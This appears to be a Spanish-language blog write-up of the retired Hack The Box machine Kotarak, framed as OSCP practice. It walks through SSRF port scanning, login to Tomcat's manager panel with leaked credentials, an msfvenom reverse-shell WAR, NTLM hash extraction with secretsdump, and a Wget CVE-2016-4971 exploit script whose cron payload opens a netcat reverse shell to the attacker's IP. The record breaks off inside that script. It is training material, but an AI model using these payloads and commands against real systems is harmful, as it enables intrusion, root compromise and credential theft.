<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>OSCP Path ~ Kotarak de Hack The Box (Necesario VIP) | Blog de Hacking</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="OSCP Path ~ Kotarak de Hack The Box (Necesario VIP)" />
<meta name="author" content="K0Hack" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Writeup de la maquina de HackTheBox llamada KOTARAK siguiendo el PATH para el OSCP" />
<meta property="og:description" content="Writeup de la maquina de HackTheBox llamada KOTARAK siguiendo el PATH para el OSCP" />
<link rel="canonical" href="http://localhost:4000/2021/07/20/Kotarak.html" />
<meta property="og:url" content="http://localhost:4000/2021/07/20/Kotarak.html" />
<meta property="og:site_name" content="Blog de Hacking" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-07-20T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="OSCP Path ~ Kotarak de Hack The Box (Necesario VIP)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"K0Hack"},"dateModified":"2021-07-20T00:00:00-03:00","datePublished":"2021-07-20T00:00:00-03:00","description":"Writeup de la maquina de HackTheBox llamada KOTARAK siguiendo el PATH para el OSCP","headline":"OSCP Path ~ Kotarak de Hack The Box (Necesario VIP)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/07/20/Kotarak.html"},"url":"http://localhost:4000/2021/07/20/Kotarak.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Blog de Hacking" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Blog de Hacking<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Blog Personal de K0Hack sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">OSCP Path ~ Kotarak de Hack The Box (Necesario VIP)</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/OSCP/">OSCP</a>
      
      <a class="tag" href="/tag/Path,/">Path,</a>
      
      <a class="tag" href="/tag/SSRF,/">SSRF,</a>
      
      <a class="tag" href="/tag/Tomcat/">Tomcat</a>
      
      <a class="tag" href="/tag/8.6,/">8.6,</a>
      
      <a class="tag" href="/tag/Impackect-SecretsDump,/">Impackect-SecretsDump,</a>
      
      <a class="tag" href="/tag/Wget/">Wget</a>
      
      <a class="tag" href="/tag/Privesc,/">Privesc,</a>
      
      <a class="tag" href="/tag/CRON,/">CRON,</a>
      
      <a class="tag" href="/tag/Maquinas/">Maquinas</a>
      
      <a class="tag" href="/tag/Retiradas,/">Retiradas,</a>
      
      <a class="tag" href="/tag/Writeup,/">Writeup,</a>
      
      <a class="tag" href="/tag/Hacking/">Hacking</a>
      
  </div>
  
  <div class="post-date">Published on 20 Jul 2021</div>
  
  <noscript>
    <div class="post-description">Writeup de la maquina de HackTheBox llamada KOTARAK siguiendo el PATH para el OSCP</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="kotarak--hack-the-box-to-oscp">Kotarak ~ Hack The Box to OSCP</h1>

<p>Realizamos el Primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.55       "</span>
</code></pre></div></div>
<p>Procedemos con el siguiente escaneo de Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 <span class="o">(</span>RSA<span class="o">)</span>
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 <span class="o">(</span>ED25519<span class="o">)</span>
8009/tcp  open  ajp13   Apache Jserv <span class="o">(</span>Protocol v1.3<span class="o">)</span>
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp  open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open  http    Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title:         Kotarak Web Hosting        
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>

<p>Procedemos a hacer un reconocimiento visual de los servicios <code class="language-plaintext highlighter-rouge">http</code> en los diferentes puertos encontrados:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># 1 - http://10.10.10.55:8080/</span>
Apache Tomcat/8.5.5

<span class="c"># 2 - http://10.10.10.55:60000/ </span>
Encontramos un buscador en el cual intentamos apuntar a la localhost de la maquin por el puerto 22 que sabiamos que estaba abierto.
Vemos que nos responde correctamente  para el puerto 22 que si estaba abierto.
</code></pre></div></div>
<p>Probamos a usar la herramienta Wfuzz para fuzzear por el campo que tenemos, nos creamos un diccionario `PortsDicc.txt</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># wfuzz -c --hc=404 --hl=2 -t 200 -w PortsDicc.txt http://10.10.10.55:60000/url.php?path=http://127.0.0.1:FUZZ                       130 ⨯</span>
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="s1">'s documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.55:60000/url.php?path=http://127.0.0.1:FUZZ
Total requests: 65535

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                     
=====================================================================

000000320:   200        26 L     109 W      1232 Ch     "320"                                                                       
000000200:   200        3 L      2 W        22 Ch       "200"                                                                       
000000022:   200        4 L      4 W        62 Ch       "22"                                                                        
000000888:   200        78 L     265 W      3955 Ch     "888"                                                                       
000000110:   200        17 L     24 W       187 Ch      "110"                                                                       
000000090:   200        11 L     18 W       156 Ch      "90"                                                                        
000060000:   200        78 L     130 W      1171 Ch     "60000" 
</span></code></pre></div></div>
<p>SSRF - Listamos puertos internos de la maquina atraves del buscador de la web apuntando al localhost : y el puerto filtrando por la longitud en la respuesta.</p>

<p>Investigamos los Recursos Encontrados</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.10.55:60000/url.php?path<span class="o">=</span>http%3A%2F%2F127.0.0.1%3A888
</code></pre></div></div>
<p>Encontramos un directory listing con un archivo llamado <code class="language-plaintext highlighter-rouge">Backup</code>, intentamos apuntar a el.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Apuntamos al documento añadiendo `?doc=backup`</span>
view-source:http://10.10.10.55:60000/url.php?path<span class="o">=</span>http%3A%2F%2F127.0.0.1%3A888?doc<span class="o">=</span>backup 
</code></pre></div></div>
<p>No se ve nada <code class="language-plaintext highlighter-rouge">--- hacemos Ctrl+U ---</code>  Encontramos Credenciales para algun login a nivel web.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"admin"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"3@g01PdhB!"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"manager,manager-gui,admin-gui,manager-script"</span>/&gt;
</code></pre></div></div>
<p>Buscamos si a nivel del <code class="language-plaintext highlighter-rouge">Tomcat en el puerto 8080</code>
Buscamos con searchsploit:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># searchsploit Tomcat 8.5.5                                                                                                            1 ⚙</span>
<span class="nt">-----------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
 Exploit Title                                                                                             |  Path
<span class="nt">-----------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
Apache Tomcat &lt; 9.0.1 <span class="o">(</span>Beta<span class="o">)</span> / &lt; 8.5.23 / &lt; 8.0.47 / &lt; 7.0.8 - JSP Upload Bypass / Remote Code Execution <span class="o">(</span> | jsp/webapps/42966.py
Apache Tomcat &lt; 9.0.1 <span class="o">(</span>Beta<span class="o">)</span> / &lt; 8.5.23 / &lt; 8.0.47 / &lt; 7.0.8 - JSP Upload Bypass / Remote Code Execution <span class="o">(</span> | windows/webapps/42953.txt
<span class="nt">-----------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
</code></pre></div></div>
<p>Conseguimos entrar al panel del Admin a nivel web de Tomcat:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.10.55:8080/manager/html
</code></pre></div></div>
<p>Introducimos las contraseñas encontradas y accedemos al panel como Administradores.
Desde Aqui seguimos los pasos para explotar el CMS Tomcat.</p>

<p>Con la herramienta Msfvenom vamos a crear un payload <code class="language-plaintext highlighter-rouge">.war</code> para subir al CMS de Tomcat.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> msfvenom <span class="nt">-p</span> java/shell_reverse_tcp <span class="nv">lhost</span><span class="o">=</span>10.10.14.12 <span class="nv">lport</span><span class="o">=</span>443 <span class="nt">-f</span> war <span class="nt">-o</span> pwn.war
</code></pre></div></div>
<p>Una vez creado lo subimos a la CMS y apuntamos a la ruta del archivo, para que se ejecute y recibamos la conexion Reversa.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.10.55:8080/pwn/

<span class="c"># nc -vlnp 443                                                                                                                                                                                               1 ⚙</span>
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>10.10.14.12] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.55] 44244
<span class="nb">whoami
</span>tomcat
</code></pre></div></div>
<p>Procedemos a hacer un tratamioento de la tty</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("/bin/bash")'</span><span class="p">;</span>
tomcat@kotarak-dmz:/<span class="nv">$ </span>^Z
zsh: suspended  nc <span class="nt">-vlnp</span> 443
                                                                                                                                                                                                                   
┌──<span class="o">(</span>root💀kali<span class="o">)</span>-[/home/Escritorio/HTB]
└─# <span class="nb">stty </span>raw <span class="nt">-echo</span><span class="p">;</span> <span class="nb">fg                                                                                                                                                                                   </span>148 ⨯ 2 ⚙
<span class="o">[</span>1]  - continued  nc <span class="nt">-vlnp</span> 443
                              reset
reset: unknown terminal <span class="nb">type </span>unknown
Terminal <span class="nb">type</span>? xterm

tomcat@kotarak-dmz:/<span class="nv">$ </span><span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
tomcat@kotarak-dmz:/<span class="nv">$ </span><span class="nb">export </span><span class="nv">SHELL</span><span class="o">=</span>bash
tomcat@kotarak-dmz:/<span class="nv">$ </span><span class="nb">stty </span>rows 50 columns 212
</code></pre></div></div>

<h1 id="escaladad-de-privilegios--uso-de-impacket-secretsdump">Escaladad de privilegios ~ Uso de Impacket-secretsdump</h1>

<p>Nos dirigimos a la ruta <code class="language-plaintext highlighter-rouge">/home/tomcat</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tomcat@kotarak-dmz:/home/tomcat<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-lR</span>
.:
total 4
drwxr-xr-x 3 tomcat tomcat 4096 Jul 21  2017 to_archive

./to_archive:
total 4
drwxr-xr-x 2 tomcat tomcat 4096 Jul 21  2017 pentest_data

./to_archive/pentest_data:
total 28304
<span class="nt">-rw-r--r--</span> 1 tomcat tomcat 16793600 Jul 21 <span class="s2">" 2017 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit "</span>
<span class="nt">-rw-r--r--</span> 1 tomcat tomcat 12189696 Jul 21 <span class="s2">" 2017 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin "</span>
</code></pre></div></div>

<p>Procedemos a pasarnos los archivos a nuestro <code class="language-plaintext highlighter-rouge">Kali</code> para analizarlos:
Estos dos archivos resultan ser del uso de la herramienta psexec para dumpear los hashes NTLM del sistema. 
Podemos usar una herramienta de <code class="language-plaintext highlighter-rouge">impacket</code> llamada <code class="language-plaintext highlighter-rouge">secretsdumps</code> para extrar los hashes de estos dos archivos.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># impacket-secretsdump -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit LOCAL</span>
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span><span class="nb">id</span>:rid:lmhash:nthash<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Searching <span class="k">for </span>pekList, be patient
<span class="o">[</span><span class="k">*</span><span class="o">]</span> PEK <span class="c"># 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Reading and decrypting hashes from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit 
<span class="s2">" Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11::: "</span>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC<span class="nv">$:</span>1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8<span class="nv">$:</span>1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1<span class="nv">$:</span>1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31<span class="nv">$:</span>1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7<span class="nv">$:</span>1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
<span class="s2">" atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::"</span>
</code></pre></div></div>
<p>Probamos a crackear con rainbowtables los hashes obtenidos para el usuario administrator y atanas, ya que lo hemos podido enumerar en el sistema victima.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Administrator: f16tomcat!
atanas: Password123!
</code></pre></div></div>
<p>A nivel del PC victima:
Escalamos de usuario de tomcat a atanas mediante las siguientes credenciales</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>atanas: f16tomcat!
</code></pre></div></div>
<p>Procedemos con la escalada de privilegios</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tomcat@kotarak-dmz:/home/tomcat<span class="nv">$ </span>su atanas
Password:  

atanas@kotarak-dmz:/home/tomcat<span class="nv">$ </span><span class="nb">cd</span> ..
atanas@kotarak-dmz:/home<span class="nv">$ </span><span class="nb">cd </span>atanas/
atanas@kotarak-dmz:~<span class="nv">$ </span><span class="nb">ls
</span>user.txt
atanas@kotarak-dmz:~<span class="nv">$ </span><span class="nb">cat </span>user.txt 
93f844f50491ef797c9c1xxxxxxxxxx
</code></pre></div></div>
<p>Procedemos a enumerar el sistema desde la raiz:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>atanas@kotarak-dmz:/<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span>
total 97
drwxr-xr-x   3 root root  4096 Jul 21  2017 backups
drwxr-xr-x   2 root root  4096 Jul  9  2017 bin
drwxr-xr-x   4 root root  1024 Aug 29  2017 boot
drwxr-xr-x  20 root root  3980 Jul 20 05:56 dev
drwxr-xr-x 105 root root  4096 Jan 18  2018 etc
drwxr-xr-x   4 root root  4096 Jul 21  2017 home
drwxr-xr-x  24 root root  4096 Jul 21  2017 lib
drwxr-xr-x   2 root root  4096 Jul 21  2017 lib32
drwxr-xr-x   2 root root  4096 Jul 21  2017 lib64
drwxr-xr-x   2 root root  4096 Jul 21  2017 libx32
drwx------   2 root root 16384 Jul  9  2017 lost+found
drwxr-xr-x   4 root root  4096 Jul 21  2017 media
drwxr-xr-x   2 root root  4096 Jul 19  2016 mnt
drwxr-xr-x   4 root root  4096 Jul 21  2017 opt
dr-xr-xr-x 137 root root     0 Jul 20 05:56 proc
<span class="s2">"drwxrwxrwx   6 root root  4096 Sep 19  2017 root "</span>    <span class="nt">---------</span> PODEMOS ACCEDER <span class="nt">------------</span> 
drwxr-xr-x  27 root root   940 Jul 20 06:25 run
drwxr-xr-x   2 root root 12288 Jul 21  2017 sbin
drwxr-xr-x   2 root root  4096 Jul 21  2017 snap
drwxr-xr-x   2 root root  4096 Jul 21  2017 srv
dr-xr-xr-x  13 root root     0 Jul 20 05:56 sys
drwxrwxrwt  10 root root  4096 Jul 20 06:56 tmp
drwxr-xr-x  13 root root  4096 Jul 21  2017 usr
drwxr-xr-x  15 root root  4096 Jul 21  2017 var
lrwxrwxrwx   1 root root    29 Aug 29  2017 vmlinuz -&gt; boot/vmlinuz-4.4.0-87-generic
lrwxrwxrwx   1 root root    29 Jul  9  2017 vmlinuz.old -&gt; boot/vmlinuz-4.4.0-83-generic
</code></pre></div></div>

<h1 id="escada-de-privilegios-final--wget-116-vuln">Escada de privilegios final ~ Wget 1.16 vuln</h1>
<p>Enumeramos el directorio <code class="language-plaintext highlighter-rouge">/root/</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>atanas@kotarak-dmz:/root<span class="nv">$ </span><span class="nb">cat </span>flag.txt 
Getting closer! But what you are looking <span class="k">for </span>can<span class="s1">'t be found here.
atanas@kotarak-dmz:/root$ cat app.log 
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
</span></code></pre></div></div>
<p>Encontramos una peticion a nivel de un servicio http de la ip 10.0.3.133</p>

<p>Procedemos a buscar por <code class="language-plaintext highlighter-rouge">searchsploit wget/1.6</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="c"># searchsploit wget 1.16    </span>
<span class="nt">-------------------------------------------------------------------------------------------------------------------------------</span>
 Exploit Title                                                                                         | Path
<span class="nt">-------------------------------------------------------------------------------------------------------------------------------</span>
GNU Wget &lt; 1.18 - Access List Bypass / Race Condition                                                  | multiple/remote/40824.py
GNU Wget &lt; 1.18 - Arbitrary File Upload / Remote Code Execution                                        | linux/remote/40064.txt
<span class="nt">--------------------------------------------------------------------------------------------------------------------------------</span>
</code></pre></div></div>
<p>Nos quedamos con el .txt y vemos que tenemos un exploit para un contexto en el que atraves de una peticion por WGET se permite redireccionar a otro archivo cualquiera.
Procedemos de la siguiente manera:
1.- nos creamos en nuestra maquina un archivo llamado <code class="language-plaintext highlighter-rouge">.wgetrc</code> en el cual le vamos a solicitar la flag de root.txt y vamos a injectar una tarea cron</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat .wgetrc                              </span>
post_file <span class="o">=</span> /root/root.txt
output_document <span class="o">=</span> /etc/cron.d/wget-root-shell
</code></pre></div></div>
<p>Tenemos que hacer uso del siguiente exploit desde la maquina victima que viene dado en el <code class="language-plaintext highlighter-rouge">.txt</code> encontrado con searchsploit</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># cat exp1.py 
#!/usr/bin/env python
</span>
<span class="c1">#
# Wget 1.18 &lt; Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971 
#
</span>
<span class="kn">import</span> <span class="nn">SimpleHTTPServer</span>
<span class="kn">import</span> <span class="nn">SocketServer</span>
<span class="kn">import</span> <span class="nn">socket</span><span class="p">;</span>

<span class="k">class</span> <span class="nc">wgetExploit</span><span class="p">(</span><span class="n">SimpleHTTPServer</span><span class="p">.</span><span class="n">SimpleHTTPRequestHandler</span><span class="p">):</span>
   <span class="k">def</span> <span class="nf">do_GET</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
       <span class="c1"># This takes care of sending .wgetrc
</span>
       <span class="k">print</span> <span class="s">"We have a volunteer requesting "</span> <span class="o">+</span> <span class="bp">self</span><span class="p">.</span><span class="n">path</span> <span class="o">+</span> <span class="s">" by GET :)</span><span class="se">\n</span><span class="s">"</span>
       <span class="k">if</span> <span class="s">"Wget"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="bp">self</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="n">getheader</span><span class="p">(</span><span class="s">'User-Agent'</span><span class="p">):</span>
          <span class="k">print</span> <span class="s">"But it's not a Wget :( </span><span class="se">\n</span><span class="s">"</span>
          <span class="bp">self</span><span class="p">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span>
          <span class="bp">self</span><span class="p">.</span><span class="n">end_headers</span><span class="p">()</span>
          <span class="bp">self</span><span class="p">.</span><span class="n">wfile</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"Nothing to see here..."</span><span class="p">)</span>
          <span class="k">return</span>

       <span class="k">print</span> <span class="s">"Uploading .wgetrc via ftp redirect vuln. It should land in /root </span><span class="se">\n</span><span class="s">"</span>
       <span class="bp">self</span><span class="p">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">301</span><span class="p">)</span>
       <span class="n">new_path</span> <span class="o">=</span> <span class="s">'%s'</span><span class="o">%</span><span class="p">(</span><span class="s">'ftp://anonymous@%s:%s/.wgetrc'</span><span class="o">%</span><span class="p">(</span><span class="n">FTP_HOST</span><span class="p">,</span> <span class="n">FTP_PORT</span><span class="p">)</span> <span class="p">)</span>
       <span class="k">print</span> <span class="s">"Sending redirect to %s </span><span class="se">\n</span><span class="s">"</span><span class="o">%</span><span class="p">(</span><span class="n">new_path</span><span class="p">)</span>
       <span class="bp">self</span><span class="p">.</span><span class="n">send_header</span><span class="p">(</span><span class="s">'Location'</span><span class="p">,</span> <span class="n">new_path</span><span class="p">)</span>
       <span class="bp">self</span><span class="p">.</span><span class="n">end_headers</span><span class="p">()</span>

   <span class="k">def</span> <span class="nf">do_POST</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
       <span class="c1"># In here we will receive extracted file and install a PoC cronjob
</span>
       <span class="k">print</span> <span class="s">"We have a volunteer requesting "</span> <span class="o">+</span> <span class="bp">self</span><span class="p">.</span><span class="n">path</span> <span class="o">+</span> <span class="s">" by POST :)</span><span class="se">\n</span><span class="s">"</span>
       <span class="k">if</span> <span class="s">"Wget"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="bp">self</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="n">getheader</span><span class="p">(</span><span class="s">'User-Agent'</span><span class="p">):</span>
          <span class="k">print</span> <span class="s">"But it's not a Wget :( </span><span class="se">\n</span><span class="s">"</span>
          <span class="bp">self</span><span class="p">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span>
          <span class="bp">self</span><span class="p">.</span><span class="n">end_headers</span><span class="p">()</span>
          <span class="bp">self</span><span class="p">.</span><span class="n">wfile</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"Nothing to see here..."</span><span class="p">)</span>
          <span class="k">return</span>

       <span class="n">content_len</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="n">getheader</span><span class="p">(</span><span class="s">'content-length'</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span>
       <span class="n">post_body</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">rfile</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="n">content_len</span><span class="p">)</span>
       <span class="k">print</span> <span class="s">"Received POST from wget, this should be the extracted /etc/shadow file: </span><span class="se">\n\n</span><span class="s">---[begin]---</span><span class="se">\n</span><span class="s"> %s </span><span class="se">\n</span><span class="s">---[eof]---</span><span class="se">\n\n</span><span class="s">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">post_body</span><span class="p">)</span>

       <span class="k">print</span> <span class="s">"Sending back a cronjob script as a thank-you for the file..."</span> 
       <span class="k">print</span> <span class="s">"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"</span>
       <span class="bp">self</span><span class="p">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span>
       <span class="bp">self</span><span class="p">.</span><span class="n">send_header</span><span class="p">(</span><span class="s">'Content-type'</span><span class="p">,</span> <span class="s">'text/plain'</span><span class="p">)</span>
       <span class="bp">self</span><span class="p">.</span><span class="n">end_headers</span><span class="p">()</span>
       <span class="bp">self</span><span class="p">.</span><span class="n">wfile</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">ROOT_CRON</span><span class="p">)</span>

       <span class="k">print</span> <span class="s">"</span><span class="se">\n</span><span class="s">File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) </span><span class="se">\n</span><span class="s">"</span>

       <span class="k">return</span>

<span class="n">HTTP_LISTEN_IP</span> <span class="o">=</span> <span class="s">'0.0.0.0'</span>  <span class="c1"># modificamos este valor para que este a la escucha por cualquier conexion entrante
</span><span class="n">HTTP_LISTEN_PORT</span> <span class="o">=</span> <span class="mi">80</span>
<span class="n">FTP_HOST</span> <span class="o">=</span> <span class="s">'10.10.14.12'</span>   <span class="c1"># ponemos nuestra IP
</span><span class="n">FTP_PORT</span> <span class="o">=</span> <span class="mi">21</span>

<span class="c1"># Le metemos una Reverse_shell como tarea cron para que nos la ejecute
</span><span class="n">ROOT_CRON</span> <span class="o">=</span> <span class="s">"* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.12 443 &gt;/tmp/f"</span>

<span class="n">handler</span> <span class="o">=</span> <span class="n">SocketServer</span><span class="p">.</span><span class="n">TCPServer</span><span class="p">((</span><span class="n">HTTP_LISTEN_IP</span><span class="p">,</span> <span class="n">HTTP_LISTEN_PORT</span><span class="p">),</span> <span class="n">wgetExploit</span><span class="p">)</span>

<span class="k">print</span> <span class="s">"Ready? Is your FTP server running?"</span>

<span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">sock</span><span class="p">.</span><span class="n">connect_ex</span><span class="p">((</span><span class="n">FTP_HOST</span><span class="p">,</span> <span class="n">FTP_PORT</span><span class="p">))</span>
<span class="k">if</span> <span class="n">result</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
   <span class="k">print</span> <span class="s">"FTP found open on %s:%s. Let's go then</span><span class="se">\n</span><span class="s">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">FTP_HOST</span><span class="p">,</span> <span class="n">FTP_PORT</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
   <span class="k">print</span> <span class="s">"FTP is down :( Exiting."</span>
   <span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

